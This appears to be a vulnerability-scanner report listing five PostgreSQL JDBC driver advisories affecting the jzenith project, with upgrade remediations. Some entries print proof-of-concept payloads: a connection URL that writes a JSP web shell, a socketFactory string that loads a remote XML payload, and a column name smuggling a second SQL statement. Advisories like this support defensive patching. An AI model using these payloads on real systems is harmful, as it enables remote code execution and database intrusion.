Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: org.postgresql:postgresql
- Introduced through: org.postgresql:postgresql@42.2.16
Detailed paths
-
Introduced through: marcust/jzenith@marcust/jzenith#a4b18c1b3adac5e731216ad8e4b6c722b2497c60 › org.postgresql:postgresql@42.2.16Remediation: Upgrade to org.postgresql:postgresql@42.2.28.jre7.
Overview
org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.
Affected versions of this package are vulnerable to SQL Injection when using PreferQueryMode=SIMPLE, which is not the default setting. By passing in a numeric value placeholder immediately preceded by a minus and followed by a second placeholder for a string value, on the same line, an attacker can construct a payload that alters the parameterized query into which it is interpolated. This effectively bypasses the protections against SQL Injection that parameterized queries offer.
Remediation
Upgrade org.postgresql:postgresql to version 42.2.28.jre7, 42.3.9, 42.4.4, 42.5.5, 42.6.1, 42.7.2 or higher.
References
high severity
- Vulnerable module: org.postgresql:postgresql
- Introduced through: org.postgresql:postgresql@42.2.16
Detailed paths
-
Introduced through: marcust/jzenith@marcust/jzenith#a4b18c1b3adac5e731216ad8e4b6c722b2497c60 › org.postgresql:postgresql@42.2.16Remediation: Upgrade to org.postgresql:postgresql@42.3.3.
Overview
org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.
Affected versions of this package are vulnerable to Arbitrary Code Injection. DISPUTED
When an arbitrary filename is specified in the loggerFileName connection parameter jdbc:postgresql://localhost:5432/test?user=test&password=test&loggerLevel=DEBUG&loggerFile=./blah.jsp&<%Runtime.getRuntime().exec(request.getParameter("i"));%>, a valid JSP file is created and a Remote Code Execution could be performed.
Note: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties.
Remediation
Upgrade org.postgresql:postgresql to version 42.3.3 or higher.
References
high severity
- Vulnerable module: org.postgresql:postgresql
- Introduced through: org.postgresql:postgresql@42.2.16
Detailed paths
-
Introduced through: marcust/jzenith@marcust/jzenith#a4b18c1b3adac5e731216ad8e4b6c722b2497c60 › org.postgresql:postgresql@42.2.16Remediation: Upgrade to org.postgresql:postgresql@42.2.25.
Overview
org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) when using certain plugin features.
pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, and sslpasswordcallback connection properties.
However, the driver did not verify if the class implements the expected interface before instantiating the class.
PoC
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");
Remediation
Upgrade org.postgresql:postgresql to version 42.2.25, 42.3.2 or higher.
References
high severity
- Vulnerable module: org.postgresql:postgresql
- Introduced through: org.postgresql:postgresql@42.2.16
Detailed paths
-
Introduced through: marcust/jzenith@marcust/jzenith#a4b18c1b3adac5e731216ad8e4b6c722b2497c60 › org.postgresql:postgresql@42.2.16Remediation: Upgrade to org.postgresql:postgresql@42.2.26.
Overview
org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.
Affected versions of this package are vulnerable to SQL Injection via the java.sql.ResultRow.refreshRow() function in jdbc/PgResultSet.java, due to insufficient escaping column names. An attacker with control of the underlying database can name a column with a string containing a semicolon or other statement terminator, then convince a user to run a query against the table with the compromised column, and then have the application run ResultSet.refreshRow(), to execute code.
NOTE:
- An application that only connects to its own database with a fixed schema with no DDL permissions is not affected by this vulnerability.
- Additionally, applications that do not invoke
ResultSet.refreshRow()are not affected.
PoC:
CREATE TABLE refresh_row_example (
id int PRIMARY KEY,
"1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * " int
);
Remediation
Upgrade org.postgresql:postgresql to version 42.2.26, 42.3.7, 42.4.1 or higher.
References
medium severity
- Vulnerable module: org.postgresql:postgresql
- Introduced through: org.postgresql:postgresql@42.2.16
Detailed paths
-
Introduced through: marcust/jzenith@marcust/jzenith#a4b18c1b3adac5e731216ad8e4b6c722b2497c60 › org.postgresql:postgresql@42.2.16Remediation: Upgrade to org.postgresql:postgresql@42.2.27.
Overview
org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.
Affected versions of this package are vulnerable to Information Exposure in the pgjdbc driver, which writes to the operating system's shared temp directory when the InputStream to either PreparedStatement.setText(int, InputStream) or PreparedStatemet.setBytea(int, InputStream) is larger than 2K. The temporary file is readable by other users. This is the default system behavior on Unix systems but not on MacOS.
NOTE: This vulnerability is only fixed for JDK 1.7. Systems using JDK 1.6 or below can work around the vulnerability by setting the environment variable java.io.tmpdir to a non-world-readable location.
Remediation
Upgrade org.postgresql:postgresql to version 42.2.27, 42.3.8, 42.4.3, 42.5.1 or higher.